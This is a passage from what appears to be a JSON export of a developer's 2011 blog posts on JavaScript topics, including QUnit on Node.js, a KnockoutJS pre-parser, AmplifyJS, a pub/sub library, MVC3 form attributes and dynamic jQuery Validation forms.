QUnit tests that already shipped in source of Knockout.Unobtrusive I plan to use the Node.js implementation of QUnit. It’s rather simple and again we’ll create a Cake task:\ntask 'tests', "run tests for #{file}", -> console.log 'Time for some tests! 
' runner = require 'qunit' sys = require 'sys' colors = require 'colors' test = code: "./#{output}/#{file}.js", tests: "./tests/#{file}.tests.js" runner.options.summary = false report = (r) -> if r.errors msg = "Uh oh, there were errors" sys.puts msg.bold.red else msg = 'All test pass' sys.puts msg.green runner.run test, report So a few things of note:\nWe’re using the runner which comes with QUnit for Node.js We’re creating an object with our tests info which includes: The file under test The tests to execute I’m suppressing the summary (we execute the tests a lot so there’s no need to see it) Lastly there’s a callback for when the runner finishes which will either dump a message on success or failure (with a pretty colour!) From the point of view of the Cakefile that’s really all we have a need for, we’ve got our watcher up and running and we can just kick it off:\ncake watch Now whenever we edit our CoffeeScript file it’ll go nicely.\nWrapping upSo this wraps up the first part of migrating our tests out of the browser to make a more automated series of JavaScript tests.\nNext time we’ll look at how to deal with some of the limitations of working in a DOM-less environment.\n", "id": "2011-09-03-qunit-beyond-the-browser-part-1" }, { "title": "Slides from WUX202", "url": "https://www.aaron-powell.com/posts/2011-09-03-slides/", "date": "Sat, 03 Sep 2011 00:00:00 +0000", "tags": [ "tenz", "speaking", "teched-nz-2011" ], "description": "", "content": "I recently spoke at Teched NZ in a session called Chasing the Evolving Web.\nHere’s the slides from the talk:\nSlides And here’s a list of the tools which I looked at in my presentation:\nHTML5 Boilerplate\nModernizr\nYepNope.js\nRaphaelJS\nEaselJS\nAmplifyJS\nKnockout\nBackbone\n", "id": "2011-09-03-slides" }, { "title": "Introducing the KnockoutJS preparser", "url": "https://www.aaron-powell.com/posts/2011-08-09-knockoutjs-preparser/", "date": "Tue, 09 Aug 2011 00:00:00 +0000", "tags": [ "javascript", "knockoutjs" ], "description": "", "content": "In my previous post I outlined one of the biggest issues I have with KnockoutJS as being its WPF/ Silverlight binding syntax and how it requires you to put JavaScript into your HTML.\nNow I’m a pretty firm believe that if you are going to criticise something then you better make it constructive. Just saying “I don’t like blah” isn’t helpful to a) the author of blah or b) people wanting to learn more about blah, so I decided that I would follow up my criticism of KnockoutJS with a way I would go about fixing it.\nIntroducing the KnockoutJS preparserTo address my issue with KnockoutJS use of JavaScript in HTML I started looking at how I would go about it and the solution I kept coming back to was using the data-* attributes to describe in my HTML an intention. I decided that if I could do this in a good, convention approach then I should be able to translate it back into a KnockoutJS binding with minimal impact.\nOut of this idea (and a challenge from my colleague Ducas) I set about taking my idea from my brain and putting in code.\nEssentially what I came up with was taking this:\n<span data-ko-text="firstName"></span> And turning it into this:\n<span data-bind="text: firstName"></span> The idea is that you take data-ko-* as a prefix and use that to describe what could (well will…) become your binding syntax. 
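To give a rough feel for how that transformation can work, here's an illustrative sketch (not the actual pre-parser code, and it only handles the simple data-ko-* cases) which collects the data-ko-* attributes on each element and folds them into a single data-bind attribute; the real project wires this in by hijacking ko.applyBindings, as described below:

// illustrative only: fold data-ko-* attributes into a data-bind attribute
function preParse(root) {
    var elements = root.querySelectorAll('*');
    for (var i = 0; i < elements.length; i++) {
        var el = elements[i],
            bindings = [];
        for (var j = 0; j < el.attributes.length; j++) {
            var attr = el.attributes[j],
                match = /^data-ko-(.+)$/.exec(attr.name);
            if (match) {
                // data-ko-text="firstName" becomes "text: firstName"
                bindings.push(match[1] + ': ' + attr.value);
            }
        }
        if (bindings.length) {
            el.setAttribute('data-bind', bindings.join(', '));
        }
    }
}
// e.g. run preParse(document.body) before ko.applyBindings is called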
Once getting this done I threw the code up on github and you can grab it from the KnockoutJS Pre-Parser project page.\nWhat does it addressThe ultimate goal is to be able to use the data-ko-* to describe out what you want in your HTML and the pre-parser will pick that up and Knockout-ify it for you. Ideally I’d like to support all common scenarios and so far I support:\nBasic bindings with text, css, value, etc Template name binding Pre-parser syntax within a template Template options (but not completely, you still have to embed JSON in your template options attribute. I added it about 3 hours ago so it’s still being worked on :P) Event handler wire ups (if you want a complex handler like defining scope, etc you’ll still have to embed JavaScript for now, I’m trying to work out how to get around that) How to use itIf you really want to know how to use it I suggest you read the Readme or the tests but the quick and dirty is:\nInclude it after you include KnockoutJS ??? Profit The pre-parser will actually hijack the ko.applyBinding method and perform the pre-parsing at that point, no custom stuff needs to be done to make it work :).\nWhere to get itAt the moment the only way to get it is via Github, depending on interest/ motivation I’ll put it up on Nuget for people to get it via as well.\nConclusionSo this wraps up my introduction to the KnockoutJS Pre-parser and an approach I am taking to address one of the issues which I have with KnockoutJS. Feel free to give me any feedback you have on the library and the idea in general.\n", "id": "2011-08-09-knockoutjs-preparser" }, { "title": "JavaScript: A story", "url": "https://www.aaron-powell.com/posts/2011-08-09-a-story/", "date": "Tue, 09 Aug 2011 00:00:00 +0000", "tags": [ "javascript", "random" ], "description": "", "content": "Everyone use to notice the old war veteran that sat on the corner. His uniform was tatty and he’s always be spouting about his heyday with lines like “Don’t you remember my role in the first browser war” and “If it wasn’t for me VBScript would be the language of choice of the browser!”. We’d look at him with pity, throw a few dollars his way and carry on with our day but never really got to know him. People who weren’t from around here would come by occasionally and notice our friend and look on bemused, wondering why we put up with him.\nAs the years went by we’d still see him sitting on his corner, but gradually he was looking less dishevelled. We still threw him money and chuckled to ourselves when he’d say “You’re not the only one who does this, everyone listens to me, I’m the most popular out there”. I mean who could really take the guy seriously? We’d put up with him for years now, we knew some of his quirks but we never really paid him the time of day unless we wanted to get lost in pain and suffering.\nThen one day he was gone; there was no dishevelled old man sitting on our corner in tatty military gear. We felt sad, had our old friend passed away at the end of the first decade in the 21st century? Should we have paid more attention to him; maybe actually loved him? In reflection maybe he wasn’t so crazy; maybe he did have a point; maybe there really was a time when his uniform sparkled and we’d have looked at him with awe.\nBut then we noticed someone looking at us. We turned to see a proud looking man in a shiny new military uniform and as we looked longer we noticed that it wasn’t some stranger looking at us but it was our old friend JavaScript. 
He was now sober, he’d been given a shave, a shiny new uniform and an array of new armaments. But what was most important was that he was looking for action.\nHe saw us looking back at him, he smiled and shouted “I’m ready for round two, let’s get this browser war started”.\nAnd with a quiet dignity he wandered off to help us fight the next generation of wars.\n", "id": "2011-08-09-a-story" }, { "title": "Are you going to Teched Australia?", "url": "https://www.aaron-powell.com/posts/2011-08-08-teched-au-2011/", "date": "Mon, 08 Aug 2011 00:00:00 +0000", "tags": [ "speaking", "techedau" ], "description": "", "content": "Because if you are you get to see me not once but twice! Woot!\nCome down and check out WEB203 - Chasing the Evolving Web and learn how to keep ahead of the game when it comes to doing the latest and greatest on the web.\nIn addition you should come to DEV305 - An MMO in 45 Minutes: Developing for 2 screens and a cloud without being cut for some utter bedlam with myself, Luke Drumm, Richard Banks and Steve Nagy.\nSee you there!\n", "id": "2011-08-08-teched-au-2011" }, { "title": "Are you going to Teched NZ?", "url": "https://www.aaron-powell.com/posts/2011-08-08-teched-nz-2011/", "date": "Mon, 08 Aug 2011 00:00:00 +0000", "tags": [ "speaking", "tenz", "umbraco" ], "description": "", "content": "Because if you are you can see me not once, not twice, but three time, and really, who wouldn’t want to see me that much :P.\nCome down to COS204 - Umbraco and Azure to learn about how awesome Umbraco is and how it really does love Azure.\nOr if web is more your thing jump on over to WUX202 - Chasing the Evolving Web to learn about being a modern web developer and WUX203 - JavaScript Pitfalls for the .NET Developer to learn about common problems encountered when doing JavaScript development and how to avoid them.\nSee you in Auckland!\n", "id": "2011-08-08-teched-nz-2011" }, { "title": "Why I don't like KnockoutJS", "url": "https://www.aaron-powell.com/posts/2011-08-08-why-i-don-t-like-knockoutjs/", "date": "Mon, 08 Aug 2011 00:00:00 +0000", "tags": [ "javascript", "knockoutjs", "rant" ], "description": "", "content": "A few times I’ve ruffled a few features by making the statement that I am not a fan of KnockoutJS.\nLet me start by clarifying a few things:\nI think the concept of KnockoutJS is a good one It’s nothing against Steve Sanderson, to have come up with it in the first place is impressive This is my opinion and I will still recommend that others try it and form their own opinions. Ok so on to backing up my statement and let me start by showing you why I am not a fan:\n<button data-bind="click: registerClick, enable: !hasClickedTooManyTimes()">Click me</button> Can’t see it? I’ll remove some of the ‘guff’:\ndata-bind="click: registerClick, enable: !hasClickedTooManyTimes()" Right there, the data-bind="..." is what I don’t like, the fact that I’m embedding potentially large amounts of JavaScript in my HTML.\nSo ultimately what it comes down to is that I have an issue with the binding syntax that is used with KnockoutJS. Now I (think) understand why it is like this, KnockoutJS has a lot of relationships with the WPF/ Sliverlight binding idea (and MVVM obviously) so it makes sense to people coming from those backgrounds. Me, I’m not a WPF/ Silverlight developer, never have been (I did try my hand at WPF but just didn’t get very far…).\nWhy does it bother me? 
You may be asking yourself that if the problem I have is with the syntax and not concept then where’s the real issue, heck it’s only a small part of it.\nAnd this is where it gets into the “don’t take my word, use it yourself” part of the post. I’m a web purest and I believe there should be a strict separation between your UI and your functionality, even in the client aspect. This means that your HTML file should only contain HTML and your JavaScript file is where the client ‘brain’ resides.\nHaving been around ASP.Net for a while (and particularly Web Forms) the idea of obtrusive JavaScript is something that you grow up with. You’re use to seeing in-line event handlers, JavaScript tacked at the bottom of the page, etc. This is a smell, your HTML file is no longer responsible for what HTML is, a mark-up language, it’s starting to try and become self aware, to intrinsically know that when I click a button some JavaScript has to be fired, that kind of stuff.\nThis is smarts that I don’t want my HTML to have.\nIn the web we’ve also seen a shift on this in recent years away from have JavaScript in HTML, and even within Microsoft we’ve seen them acknowledge this with the jQuery unobtrusive validation plugin which was released with MVC3.\nThe shift has seen us using HTML to describe the intention. Using the jQuery unobtrusive validation as an example we use the data-validate-* attributes to describe our validation rules, and then we use JavaScript to convey those rules into a functional concept.\nThis results in a clean separation between HTML and JavaScript with HTML going back to just describing intention and JavaScript taking those intentions and running with it.\nConclusion This post has basically outlined my primary grievance with KnockoutJS. As stated, I don’t have a problem with the concept of it, the idea of two-way binding is quite nice but what’s required to achieve that is where the issue lies.\n", "id": "2011-08-08-why-i-don-t-like-knockoutjs" }, { "title": "Having fun and digging deep into amplifyjs and the request API", "url": "https://www.aaron-powell.com/posts/2011-07-12-fun-in-amplifyjs-request/", "date": "Tue, 12 Jul 2011 00:00:00 +0000", "tags": [ "javascript", "amplifyjs", "doing-it-wrong" ], "description": "Let's have a bit of a fun doing something that's probably a bad idea with the AmplifyJS Request API.", "content": "Have you played with amplifyjs yet? Played with it’s cool way of handling requests?\nI really like the way you can do this:\n//in our JavaScript bootstrapper amplify.request.define("searchTwitter", "ajax", { url: "http://search.twitter.com/search.json?callback=?", dataType: "jsonp", cache: 30000 }); //in some other file amplify.request('searchTwitter', { q: 'amplifyjs' }, function (data) { //handle returned data }); It’s nice and clean a way to setup request pointers which you can then mock out for testing purposes.\nBut you know, it’s not as clean as I’d really like and if you know me you’ll know that I like to try and do something with an API that you’re not meant to do. 
So while playing with amplify I decided to dive into the code and work at how it was mapping my defined requests to the method call and doing so I found something interesting (and well… fun!):\namplify.request.resources.searchTwitter({ data: { q: 'amplifyjs' }, success: function(data) { //handle returned data } }, {}); Yep that’s right, the request function has a public property called resources, which has properties added to it that represent the requests which have been defined.\nIf you’re using an ajax request (as I defined at the start) you have two arguments to pass in:\nThe settings object, most of which are passed to $.ajax. In this case I’m passing in the data object and a success callback, a bit more explicitly obviously I haven’t quite worked out what the 2nd parameter is for other than passing in an abort handler in (but it does seem to be overridden at the end of the function anyway…) Whether or not the knowledge that you can do this is kind of any use I don’t know, I just think it’s kind of cool :P.\nSome points of note The arguments of your method hanging off resources will depend on the type of request. Amplifyjs has build in request types and supports custom types, so the arguments may be different, eg:\namplify.request.types.foo = function() { return function(callback) { console.log('aww you want to foo!'); if(callback) { callback.call(this); } }; }; amplify.request.define('bar', 'foo', {}); amplify.request.resources.bar(function() { //just a function as an argument console.log('hey, it works!'); }); This isn’t a documented feature so it works on my machine and may not work ever again I offer no warranty on this code Custom request types must return a function (in fact any request types have to return a function) It’s your choice as to whether a TypeError is better than the built in error handling This was really just a thought experiment to push an API to its limit Happy Hacking!\n", "id": "2011-07-12-fun-in-amplifyjs-request" }, { "title": "JavaScript Quiz", "url": "https://www.aaron-powell.com/posts/2011-07-10-javascript-quiz/", "date": "Sun, 10 Jul 2011 00:00:00 +0000", "tags": [ "javascript" ], "description": "", "content": "Today I released a little website, http://javascriptquiz.com, which was inspired by http://cssquiz.com.\nBasically it’s a site which I’ll put out JavaScript questions for people to tackle. 
If you have any ideas for questions which you’d like to see put out to the community feel free to drop me an email (I’m sure if you’re cluey you can find it on this site :P).\n", "id": "2011-07-10-javascript-quiz" }, { "title": "My geek origin", "url": "https://www.aaron-powell.com/posts/2011-07-06-geek-origin/", "date": "Wed, 06 Jul 2011 00:00:00 +0000", "tags": [ "random", "about" ], "description": "In the beginning there was...", "content": "In the spirits of things you never needed to know about me I decided to share my Geek Origin story with the world.\nWhen I was in late primary school (or maybe early high school, I’m not really sure, at this old age my mind is starting to go) I asked my parents to enroll me in a holiday program which involved playing with Lego and electronics.\nThis was back in the mid-90’s so having access to a fully decked out Lego kit and PC connector wasn’t exactly the norm (wait, am I saying it now is :P) so having the opportunity to spend a whole lot of time just playing with it seemed like the most awesome idea in the world.\nSo off I trotted to my holiday program where I was joined by a number of other kids my age and an instructor who gave us great piles of Lego, some command boards and showed us the basics of connecting it on the computer. We had some basic scenarios which we were to work through that involved making a merry-go-round that would stop after a period of time (and some others) but there was an more exciting prize on the horizon, if we finished early we got to have free time to do what we wanted.\nNow I’d always been someone who had to know how it worked. My dad would bring old telephones home from work and give me a screw driver and let me go to town with tinkering (and more than one electrical shock). I successfully destroyed more than one old radio that I found on council pickup day by trying to figure out where all the wires were going. So when the promise of doing what I wanted with these strange combination of statements on a computer and a pile of Lego it was ON.\nAfter completing the basic tasks I set about changing the parameters. What if I change this number? Oh look it gets a lot faster, and if I combine it with a change to the looping statement I can make it go round one way a few times then reverse itself. We dubbed our creation the merry-go-round of death (c’mon, we were like 10 :P)!\nThe power was intoxicating…\nBut then the thrill started to die down, there’s only so much I can do with this merry-go-round, so I started looking for the next big thing.\nOutside the window of the community centre was an intersection, an intersection with traffic lights. So I sat there watching them and I knew what I had to do, I had to replicate them in Lego.\nI broke down my current creation, put together a basic Lego intersection and opened up a new command editor and got cracking. Before I knew it I had lights going on and off, all perfectly in sync with the lights outside our window. I marveled in the control I had over my own little intersection.\nWhen the day was done we got to print out our little programs (on a dot matrix printer mind you!) 
which I proudly showed my parents, who gave me the blank stare that these days I’m all too used to seeing :P.\nAnd this concludes my trip down memory lane, back to where I fell in love with the power over computers that programming has given me.\n", "id": "2011-07-06-geek-origin" }, { "title": "Introducing Postman - A JavaScript Messaging Library", "url": "https://www.aaron-powell.com/posts/2011-07-02-postman/", "date": "Sat, 02 Jul 2011 00:00:00 +0000", "tags": [ "javascript", "postman", "coffeescript" ], "description": "", "content": "Prelude\nBack in May I presented at DDD Melbourne on JavaScript design patterns. One of the patterns that I was talking about was the idea of pub/ sub.\nLet me start by saying that this isn’t the first time I have blogged about pub/ sub, it’s also not the first time I’d written one, but essentially I wrote the following code snippet on stage for the audience:\n(function() { var cache = {}; function pub(name, args) { if(!cache[name]) { cache[name] = { subs: [] } } for(var i=0, il=cache[name].subs.length; i<il; i++) { cache[name].subs[i].apply(null, args); } }; function sub(name, fn) { if(!cache[name]) { cache[name] = { subs: [] } } cache[name].subs.push(fn); }; this.pubsub = { pub: pub, sub: sub }; })(); The code is short and to the point and with the addition of some error checking in it you could probably use that in a live environment.\nPost-DDD\nAfter the conference I decided that I wanted to revisit how I write pub/ sub and essentially scrap the library I last wrote and write it again (for the record I know there are plenty of existing JavaScript pub/ sub libraries out there already, but mine will be cooler, just read on :P).\nBut something else I wanted to do, and use this project as a sandbox for it, was learn more about CoffeeScript. If you haven’t heard about CoffeeScript but are doing a lot of JavaScript then I suggest you give it a look. Essentially it’s a language on top of JavaScript which aims to remove some of the syntax guff that exists, turning JavaScript into a language that is very similar to Ruby.\nSo I decided to start a new project, called Postman, that handles sending and receiving messages.\nHello Mr Postman\nSo Postman is available on my github repository and at the moment I’m quite happy with its feature set. Like a good pub/ sub library you can send and receive messages, like so:\npostman.receive('some-message', function(args) { //handle 'some-message' }); postman.deliver('some-message', ['foo', 'bar']); So with the receive method you add your handlers (sub), and with the deliver method you fire messages (pub). So yes, nothing different to your standard pub/ sub except for the fact that it has a quirky syntax.\nPostman also has the ability to chain methods, every method returns the Postman so he can chain up his operations:\npostman.deliver('message1').deliver('message2');\nMaking the Postman smart\nRemember that I said Postman was going to be the coolest pub/ sub library and you should use it above all others? Well there is actually a feature that I have included that I haven’t seen in many other libraries and that’s the idea of a message bus.\nMessage Bus 101\nThe idea of turning a pub/ sub into a message bus came to me in a recent project at work where we were using pub/ sub quite extensively but we had a bit of an issue, we couldn’t ensure that the subscriptions were happening before the publishing was done.
This meant that we could have components on our page not receiving the messages and this can be a real issue for us.\nWith a message bus though we actually track all the messages that were previously published and when a subscriber attaches its callback function it will receive the previously published messages.\nThat means that we can do the following:\npostman.deliver('message'); //some other code postman.receive('message', function() { console.log('message was received'); }); How it works Internally what Postman does is tracks every deliver method call and the arguments provided to it and when ever a receive call happens it will iterate through the delivery history and then call the callback with each of the history point.\nUsefulness of a Message Buss So now that you’ve seen that with Postman we can not only publish and receive messages using a known order of execution you can see that we’re also allowing an unknown order of execution to happen and our messages are still going to end up at the required destination.\nTold you it would be cool ;).\nSomething else that Postman exposes from its API is a way to get rid of messages. If you’re building a long-running JavaScript application you may find a point where messages reside in the history much longer than you’d like them to, and future subscribers might not care about the state of the application back when the messages first were published. It’s also important for memory management, you don’t want large JavaScript objects sitting in memory if you don’t really need them there. So what Postman does is exposes a method called dropMessages and we can use the method like so:\npostman.dropMessages('some-message'); Postman will then remove all the call history for the passed in message name. As cool as this is it might be important to drop messages conditionally. To do this Postman allows you to not just pass in a message name, but a criteria which determines the messages to drop.\nThe criteria that you pass in can be either a function or a date, so you can determine which messages to drop using logic (say if you wanted to drop based on the args that it received) or drop messages older than a certain date.\nIf you use a function to drop messages it’ll take a callback that internally get’s passed to the [Array.map][7] function, so make sure that you implement it to take those arguments, with the element value being a JavaScript object matching the following schema:\n{ args: [], created: Date, lastPublished: Date } The args property is the arguments that passed into the message (an empty array if you don’t provide arguments), created being a date object which is when the message was raised and lastPublished was when the message was last sent to the a callback.\nLastly when you call the receive method you can pass in an optional third argument which indicates whether the history will be ignored or not. By default history wont be ignored but if you’re doing a subscription that you don’t want the history provided to it you can use it like so:\npostman.receive('some-message', function() { }, true); Tests Something else I decided to do with Postman was to ensure that it does actually work as advertised. To do this I’ve gone about writing a test suite which you can find here. A lot of people neglect testing when writing JavAScript, but I think it’s quite important to at the very lest sanity check your own API. I’ve used Qunit and it’s super simple to write out the tests. 
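To give an idea of what they look like, here's a made-up test in the same style (not one lifted from the actual suite, and it assumes the handler receives the delivered arguments directly):

// hypothetical QUnit test for the message bus behaviour
test('a late subscriber still receives an earlier delivery', function() {
    var received;
    postman.deliver('greeting', ['hello']);
    postman.receive('greeting', function(message) {
        // the message bus replays the earlier delivery to this new handler
        received = message;
    });
    equal(received, 'hello', 'the earlier message was replayed to the late subscriber');
});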
Fire up the html in the browser and you’ll see just how the tests themselves pass ;).\nNode.js The final goal of Postman was to be entirely unreliant on the DOM so that you could run it in a server-side JavaScript implementation such as Node.js. I’ll try and get this popped up on npm so if you want to use it in your Node projects it’ll be nice and easy.\nConclusionSo this wraps up my introduction to Postman. As I said pub/ sub is a pattern that is done to death but I hope that this library has a few features which make you choose it over the myriad of existing pub/ sub libraries out there ;).\n", "id": "2011-07-02-postman" }, { "title": "This post is best viewed in some other browser", "url": "https://www.aaron-powell.com/posts/2011-06-08-best-viewed-in-some-other-browser/", "date": "Wed, 08 Jun 2011 00:00:00 +0000", "tags": [ "html5", "opinionated" ], "description": "", "content": "Does everyone remember the good old days of when websites had the introduction\nThis website is best viewed in 800x600 and Internet Explorer 5\nNo? We’ll you missed the ‘good old days’ of the browser wars which saw the different browser vendors supporting different features which resulted in web developers having to pick and choose what browser(s) their websites would work in.\nFast forward a half dozen years and we end up in 2011 where we see a new browser war going on and this time the focus is on HTML5. With the browser vendors turning out new versions at a speed we haven’t seen in a long time, 8 to 12 weeks for IE, 12 weeks for Chrome and 14 weeks for Firefox, the features available in each browser can (and often are) different.\nTake for the example the HTML5 input types, most specifically the the date picker. For years we’ve been using plugins for our favorite JavaScript library to create date pickers so it was only natural that the browsers would evolve to having built in. But there’s a problem, only some browsers do support them.\nThis isn’t a huge issue because through tools such as Modernizr we can detect if a browser does or doesn’t support it and use a polyfill or shim to patch the gaps. Awesome, but what if the browser has partial support? For example at the time of writing the current version of Chrome is 12.0.742.91 (Official Build 87961) running WebKit 534.30 (branches/chromium/742@88085) and it supports <input type="date" />, but it only has partial support. Here’s how it looks:\nIn fact Opera is the only browser that has full support for it.\nBut that’s fine, as I said before we can use a polyfill to add the date picker, only there’s a problem. Because the partial support which the WebKit engine has kind of has a date picker but kind of doesn’t you still end up with the scroll bar on the side. 
Additionally you can’t change the format of the date that you’re entering.\nAnother interesting fact is that the <input type="number" /> in this build also appears to be mis-implementing the HTML5 spec and inserting a comma every three digits.\nThere was also the saga about the Web Sockets spec changing and potential security holes (which saw Firefox disabling them by default).\nAnd this brings me back to my original question, are we going back to the days when the differences between the browsers are holding us back from doing what we need to in complex web applications or are polyfills and shims going to save us from another generation of websites which work best in some other browser?\n", "id": "2011-06-08-best-viewed-in-some-other-browser" }, { "title": "Adding data attributes to MVC3 forms with HtmlHelpers", "url": "https://www.aaron-powell.com/posts/2011-05-26-data-attribute-mvc3-forms/", "date": "Thu, 26 May 2011 00:00:00 +0000", "tags": [ "mvc3", "asp.net-mvc" ], "description": "", "content": "In a site I’m working on I wanted to add a data attribute, you know, data-*, to a form that was being generated from a controller action in MVC3. So I have the code like this:\n@using(Html.BeginForm("Index", "Home", FormMethod.Post)) { <!-- form contents --> } Now I want the form to open in a new window, but I’m a good developer and I don’t like littering my code with target="_blank", instead I have some jQuery that I’m using to detect elements that are to go into new windows and add the attribute programmatically.\nI want to run this jQuery method:\n$('form[data-external=true]').attr('target', '_blank'); But I was stumped, how do you add data-external to the form? The HtmlHelper does allow you to pass in attributes, but they are done through an anonymous .NET object, and - isn’t valid in a member name in C# (it is in the CLR though), so this code doesn’t compile:\n@using(Html.BeginForm("Index", "Home", FormMethod.Post, new { data-external = "true" })) { Good thing is that the MVC team have already got this sorted, instead of a hyphen you can use an underscore:\n@using(Html.BeginForm("Index", "Home", FormMethod.Post, new { data_external = "true" })) { Now you’ll get a form like this:\n<form action="/home/index" method="post" data-external="true"> Hopefully this will prove handy for someone else too.\n", "id": "2011-05-26-data-attribute-mvc3-forms" }, { "title": "jQuery validation, JavaScript form submitting and another bad idea", "url": "https://www.aaron-powell.com/posts/2011-05-21-jquery-validation-and-javascript-posts/", "date": "Sat, 21 May 2011 00:00:00 +0000", "tags": [ "jquery", "javascript" ], "description": "", "content": "In my last post I looked at how to use jQuery validation in a dynamic form and some problems you can have with handling rule sets.\nSomething I mentioned in that post was that I was also submitting the form using JavaScript rather than a form post or anything. This didn’t actually make it into the final post and part of the reason was it would have added a heck of a lot more to the overall post, making it a lot longer than I think anyone would want to read.
The other part of the reason was I started writing the post at 11pm on Friday night and finished it on Saturday night, so I may have got a bit sidetracked :P (even though I did proofread it I missed that part!).\nSo as promised here is the conclusion to my last post :P.\nSubmitting forms with JavaScript\nWhen submitting a form with JavaScript there are a few ways you can go about it; one of them is to use an AJAX request on the form submit, basically serializing the form fields into a JSON blob which you include in your POST.\nThis is good because you can do progressive enhancement since you have an actual URL to POST to if JavaScript is disabled.\nBut no, we’re not going down that route, instead we’re going to be calling a JavaScript method on our external API. This poses some problems: we don’t have a URL to submit to. But we still have a <form> tag, so we’ve got an issue, we have to avoid the form submit!\nfunction postForm(validator, form) { var fields = form.find('input'), data = {}; for(var i=0, il=fields.length; i<il; i++) { var field = fields[i]; data[i] = { value: $(field).val(), type: $(field).attr('type') }; } external.submit(data); } Great, it was pretty easy to build up our submit schema, so we can hook it into jQuery Validation:\nfunction buildForm(form, fields) { var fieldset = form.find('fieldset'), ol = $('<ol></ol>'), templates = { text: $('#text-template'), date: $('#date-template') //and so on for more templates }, rules = {}, messages = {}, settings = { rules: rules, messages: messages, submitHandler: function postForm(validator, form) { var fields = form.find('input'), data = {}; for(var i=0, il=fields.length; i<il; i++) { var field = fields[i]; data[i] = { value: $(field).val(), type: $(field).attr('type') }; } external.submit(data); } }; //parse form code from the last post //update this line to use our object not the inline object $.extend(validationRules.settings, settings); } So I’ve updated the code from the last post, which now includes the submitHandler property on the settings for the validation rules. This is a method that will be called once the form passes all the validation rules that have been applied to it.\nThis is a fine piece of code and it works exactly as we would expect, except for one issue: the form will still post.\njQuery Validation works by tying into the form submit event, and the submitHandler method is called as part of that, so if all validation passes it’ll allow the browser to finish executing the submit operation. This is a problem, we’re not defining an action or a method, and according to the W3C spec the default action is the URL of the form’s owner and the default method is GET. Crap, so even if we don’t specify anything it’ll still have some default operations.\nBut it’s not really a problem, we can just use the preventDefault method to stop the event from continuing; if we can stop the event we don’t have to worry about the form submitting at all.\nWell that’s good, but we have a problem, how do we cancel the event? Sadly the submitHandler method has no access to the form event object. According to the source though we can pass in debug: true as a setting to the validator, which will then call preventDefault, but that looks ugly, having debug: true in production code…\nSo the only solution is to modify the source of the validation plugin.
Good news: I have modified the jQuery Validation plugin, I have a fork here and I hope the pull request for it gets accepted ;).\nNow we update our submitHandler method:\nsubmitHandler: function postForm(validator, form, event) { var fields = form.find('input'), data = {}; event.preventDefault();\nConclusion\nSo to wrap up the second part of the intended one-part series, we’ve looked at how you can use JavaScript to send the data and still prevent the browser from submitting the form itself.\n", "id": "2011-05-21-jquery-validation-and-javascript-posts" }, { "title": "jQuery validation, dynamic forms and a really bad idea", "url": "https://www.aaron-powell.com/posts/2011-05-20-jquery-validation-and-dynamic-forms/", "date": "Fri, 20 May 2011 00:00:00 +0000", "tags": [ "jquery", "javascript" ], "description": "", "content": "Currently at work I’m part of a team that’s developing a really JavaScript heavy application and in doing so we’re finding problems, challenges and solutions. One such problem that I was working on recently I thought I’d share with you, as it was a major source of frustration, but ultimately I succeeded and that made it all worthwhile!\nThe section of the application I’ve been working on deals with an external data source which manages some systems that the user interacts with. We don’t have any C# code that supports this section of the application, everything is provided by a third party and a JavaScript API which they have provided us with for interaction. This means that whenever we need to display something to the user they are providing us with the data. Generally speaking this is fairly straightforward, they are providing lists of data, messages, etc, but there’s one step that is quite tricky, and that is developing a form.\nSo to set up the scenario, what we have is a multi-part form. On the first step of the form we give the user an option of what they want to add and then on the second step we display a form with a number of fields. The thing is that these fields are defined by the option chosen on step 1, meaning that we have to generate the form on the fly. Breaking it down, what we’re getting back from the external API is a JSON object which represents a form schema. It dictates the fields we’re including, the order they appear in and the types of inputs. To throw another spanner in the works, the fields all need to be validated. Each field is mandatory and we have some special fields such as date fields.\nEssentially I have to take this:\n{ fields: [{ type: 'text', label: 'First Name' }, { type: 'text', label: 'Last Name' }, { type: 'date', label: 'DOB' }] } And turn it into the following:\n<form> <fieldset> <ol> <li> <label for="field-0">First Name</label> <input id="field-0" name="field-0" type="text" /> </li> <li> <label for="field-1">Last Name</label> <input id="field-1" name="field-1" type="text" /> </li> <li> <label for="field-2">DOB</label> <input id="field-2" name="field-2" type="date" /> </li> </ol> </fieldset> <button type="submit">Submit</button> </form> Now let’s have a look at how you generate a form from a JSON schema, display it to the user and ultimately configure some validation.\nOh, and to cap it all off we don’t actually have a .NET method which we’re posting the form to, there’s no ASMX, no Controller Action, no PostBack.
Instead we’re submitting the form back into a JavaScript API call which our external service is providing to us!\nGetting started\nWhen getting started with this we already had a lot of design patterns in place and JavaScript libraries to play with. For the purpose of this blog post I’m going to look at the tools which are relevant to what I’m doing and which will (hopefully) save you some time if/when you have to do something similar.\nThese tools are:\njQuery (duh!) jQuery Validate jQuery Templating\nBuilding your form\nSo I’m going to be building out my form based on a JSON schema, but I want to do it in such a way that I don’t have any “magic strings” which are responsible for DOM element creation. I’m trying really hard to keep a good clean separation between the HTML and the JavaScript, so littering my parser with HTML snippets kind of throws off my concept a bit.\nInstead I’ve decided to take a different route, I’m going to use the fantastic jQuery template engine to create the form fields to begin with. If you’re not familiar with the jQuery Templating engine then I suggest reading their docs before going much further and getting confused.\nNow my schema will only support a sub-set of form fields, so I don’t need to worry about having a solution for every different scenario, instead I’m catering for the following:\nRegular text fields Password fields Date fields Checkbox fields So for this I’m going to create separate templates for each of the form field types that are supported:\n<script type="text/x-jquery-tmpl" id="text-template"> <li> <label for="field-${index}">${label}</label> <input id="field-${index}" name="field-${index}" type="text" /> </li> </script> <script type="text/x-jquery-tmpl" id="password-template"> <li> <label for="field-${index}">${label}</label> <input id="field-${index}" name="field-${index}" type="password" /> </li> </script> (And so on, I won’t put out all the templates here, it’ll get a bit repetitive — just note that each template needs its own unique id.)\nYou could go about this a slightly different way and put conditional statements in your template. Personally I’m against that for a few reasons:\nYou end up with larger and potentially more complex templates Template parsing has an overhead. The more logic you put into a template the slower it’ll become to parse, as the regexes have to work that bit harder You’re losing your separation of concerns by bringing JavaScript into your templating engine Since we’re only templating our form fields we’ve got to have a starting HTML snippet that we’ll be appending to:\n<form> <fieldset></fieldset> <button type="submit">Submit</button> </form>\nParsing our schema\nSo now that we know how we’re going to go about building our HTML we have to parse our schema. It’s a fairly simple concept, we need to:\nIterate through each field in the response Determine the type Parse the template with the field info Let’s assume that we’ve made it to the wizard step where we call out to our external service to provide the JSON schema, now we’ve got to deal with it.\n(function($) { $(function() { //call out to our external API external.getForm('form-identifier', function(result) { //this callback will handle the parsing buildForm($('form'), result.fields); }); }); })(jQuery); This is a fairly simple little code snippet, we’re expecting to call our external API which will in turn send us our JSON schema.
